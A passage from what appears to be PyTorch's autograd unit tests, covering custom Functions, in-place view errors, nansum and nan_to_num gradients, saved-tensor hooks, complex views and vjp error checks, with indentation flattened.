"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gradcheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks that multiple views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks custom autograd.Functions that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
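# Gradients should flow back to the real-valued base tensor when named views and
# view_as_complex are mixed in the forward.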
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
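# The gradient of a ** b w.r.t. the exponent b should be the same (here
# [-inf, 0., 0.]) whether the zero base is a tensor or a plain Python scalar.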
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
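# The gradient must come back in the input's dtype even when the reduction is
# computed in a different dtype via the `dtype=` argument.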
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.nansum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
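# Integer-valued outputs (argmax, argmin, argsort, searchsorted, bucketize,
# count_nonzero, unique and friends) must never require grad, even when their
# inputs do.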
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
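# Build a reference cycle output -> grad_fn -> ctx.meta["foo"] -> output and check
# that gc can collect it both before and after backward() has cleared the saved
# tensors.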
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
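# The unpacked saved variable shares its version counter with the original output,
# so an in-place update under no_grad keeps both versions in sync.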
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original(self):
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
y = t * 2
with self.assertRaisesRegex(
RuntimeError,
"one of the variables needed for gradient computation has been modified by an inplace operation"):
y.sum().backward()
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original(self):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(torch.randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(el_res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
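# Non-Tensor inputs, non-Tensor outputs, and a missing or mis-sized v should all
# raise informative errors; a valid call returns a vjp with the same structure as
# the input.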
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
